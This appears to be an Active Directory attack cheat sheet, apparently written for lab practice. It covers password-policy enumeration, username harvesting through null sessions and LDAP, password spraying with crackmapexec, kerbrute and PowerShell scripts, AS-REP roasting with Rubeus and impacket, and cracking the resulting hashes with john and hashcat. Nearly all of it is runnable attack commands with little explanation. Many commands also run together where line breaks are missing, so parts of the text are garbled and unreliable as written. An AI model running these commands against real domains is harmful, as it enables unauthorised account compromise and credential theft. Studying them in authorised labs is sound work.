With Username
Get the password policy
cme <ip> -u "user" -p "password" --pass-polenum4linux -u "user" -p "password" -P <ip>
rpcclient -U "" -N IPrpcclient $> getdompwinfoldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLengthimport-module .\PowerView.ps1
Get-DomainPolicynet accountsMaking a Target User List
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"rpcclient -U "" -N 172.16.5.5cme smb 172.16.5.5 --userssudo cme smb 172.16.5.5 -u user -p password --usersldapsearch -h 172.16.5.5 -x -b "DC=domain,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "./windapsearch.py --dc-ip IP -u "" -Ukerbrute userenum -d domain --dc IP wordlist.txt Password Spraying
sudo cme smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +kerbrute passwordspray -d domain --dc DCIP valid_users.txt Passwordsprayhound -U <users.txt> -d <domain> -dc <dc-ip>for u in $(cat valid_users.txt);do rpcclient -U "$u%<password>" -c "getusername;quit" <dc-ip>| grep Authority; doneImport-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Password -OutFile spray_success -ErrorAction SilentlyContinue.\Spray-Passwords.ps1 -Pass <PASSWORD> -AdminASREPRoast
Identify vulnerable account with enabled "Do not require preauthentication" option.
Kerbrute
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt PowerView
Get-DomainUser -PreauthNotRequired -Properties SamAccountNameExploit AS-REP Roasting to extract password hashes.
Rubeus.exe
.\Rubeus.exe asreproast /user:username /format:hashcat /outfile:hash.txt
Get-NPUsers
impacket-GetNPUsers -dc-ip <ip> -request -outputfile <file_name> <domain/user>
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <ip> -format hashcat -requestCrack hashes for plaintext passwords.
john
.\john.exe hash.txt --format=krb5asrep -wordlist=wordlisthashcat
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt If we found a hash and we want to crack them:
Last updated